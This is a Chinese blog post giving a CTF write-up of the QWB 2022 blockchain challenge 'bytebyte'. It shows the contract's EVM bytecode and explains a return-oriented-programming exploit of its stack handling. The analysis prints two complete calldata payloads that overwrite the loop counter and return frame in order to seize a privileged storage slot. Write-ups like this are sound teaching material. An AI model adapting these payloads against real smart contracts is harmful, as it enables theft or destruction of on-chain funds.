Fork me on GitHub
pikachu's Blog

qwb2022 第六届强网杯线上赛区块链 bytebyte

前言

  • 第六届 qwb 线下赛 bytebyte 赛题 WP
  • 恭喜中国科学技术大学师傅一血
  • 考点是 Return Oriented Programming
  • revenge of EGM,堆栈细节可参考 https://hitcxy.com/2020/egm/
  • 相比于 EGMbytebyte 调整了循环变量的位置,循环变量是个范围,按照个人的构思,如果 calldata 长度是 4+32*11 字节,则这个值是固定的,变相让循环变量起到固定 canary 的作用,不过也不能排除更短的 calldata,所以题目设计是比较 calldata 的数值大小。

Source

1
6210000060405260043610610073576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680638d715d9d1461024557806360fe47b11461031a5780636d4ce63c1461035557806335f4699414610372578063b4a99a4e1461038157610073565b610078565b600080fd600060006000600060005b61012061010052565b6101005190565b60206101005101806101005252565b6101005151602061010051036101005290565b61010052565b6100ca610100516100975b565b565b6100d66100a6565b6100de6100a6565b6100e7906100b9565b565b6100f1610087565b565b34156100cc57610078565b6101086000610097565b5b7f01000000000000000000000000000000000000000000000000000000000000006101005151602061010051035101510415610152575b60016101005151016101005152610109565b61015a6100a6565b6101626100a6565b506100ce565b6103916101406097565b5b6020610100510351610100515103156101d9577f0100000000000000000000000000000000000000000000000000000000000000610100515160606101005103510151046101005151604061010051035101535b60016101005151016101005152610391565b60006101005151604061010051035101535b60406101005151061561021c5760006101005151604061010051035101535b600161010051510161010051526101eb565b6102246100a6565b5061022d6100a6565b506102366100a6565b5061023f6100a6565b506100ce565b61024d6100e9565b6102576000610097565b610100516102656212345650565b36602462013000376102756100bf565b61028061034f610097565b61028c62013000610097565b61029534610097565b6102a160243603610097565b610168565b6102ae6100bf565b6102b96102c7610097565b6102c281610097565b6100fe565b6020610100510381602060408303526020820352602060208203510660208203510360200160400160408203f35b610100515160206101005103515561030b6100a6565b506103146100a6565b506100ce565b6103226100f3565b61032a6100bf565b61033561034f610097565b610340600435610097565b61034a6000610097565b6102f5565b60006000f35b61035d6100f3565b60005433146100785760005460805260206080f35b60665433141561007857606654ff5b6066543314156100785733606655005b604061010051035160206101005103510315610403577f0100000000000000000000000000000000000000000000000000000000000000604061010051035160606101005103510151046101005151604061010051035101535b60016040610100510351016040610100510352610391565b600061010051516040610100510351015360406040610100510351061561021c5760006101005151604061010051035101535b60016040610100510351016040610100510352610415565b505050505050505050505050505050505050505050505050505050505050505050505050505050

Analyse

  • 题目会将 calldata[24:] 拷贝到 0x140 位置,其中 0x9f 是循环计数器是个变量,既要覆盖 0x2f5(返回的栈帧位置),又要满足拷贝的循环正常终止,所以是个范围值,所以题目设置的最小的 calldata 如下(比较大小会将 msg.sender 设置为0,所以不影响)

  • 题目设置的最小的 calldata 如下
1
2
3
4
5
6
7
8
9
10
11
12
data = '0x8d715d9d'
data += '0000000000000000000000000000000000000000000000000000000000000000'
data += '0000000000000000000000000000000000000000000000000000000000000000'
data += '0000000000000000000000000000000000000000000000000000000000000260'
data += '00000000000000000000000000000000000000000000000000000000000002f5'
data += '0000000000000000000000000000000000000000000000000000000000013000'
data += '000000000000000000000000000000000000000000000000000000000000009f'
data += '0000000000000000000000000000000000000000000000000000000000000140'
data += '0000000000000000000000000000000000000000000000000000000000000140'
data += '000000000000000000000000000000000000000000000000000000000000034f'
data += '0000000000000000000000000000000000000000000000000000000000000066'
data += '000000000000000000000000715e68C887512022164b9f3F28439e9d12FFF5e1'
  • 一血队伍的 calldata 更短更巧妙,通过让循环计数器 i 覆盖为终止值的方式,使得循环计数器后面的数据不再会被用到,所以不需要避开它们,这时只要使用 0x13000 之后的 offset 就可以让 ROP 正常执行,于是可以节约两个数如下
1
2
3
4
5
6
7
8
9
10
data = '0x8d715d9d'
data += '0000000000000000000000000000000000000000000000000000000000000000'
data += '0000000000000000000000000000000000000000000000000000000000000000'
data += '00000000000000000000000000000000000000000000000000000000000130e0'
data += '00000000000000000000000000000000000000000000000000000000000002f5'
data += '0000000000000000000000000000000000000000000000000000000000013000'
data += '00000000000000000000000000000000000000000000000000000000000000ff'
data += '000000000000000000000000000000000000000000000000000000000000034f'
data += '0000000000000000000000000000000000000000000000000000000000000066'
data += '0000000000000000000000000123456789012345678901234567890123456789'
---------------- The End ----------------
谢谢大爷~

Author:pikachu
Link:https://hitcxy.com/2022/bytebyte/
Contact:hitcxy.cn@gmail.com
本文基于 知识共享署名-相同方式共享 4.0 国际许可协议发布
转载请注明出处,谢谢!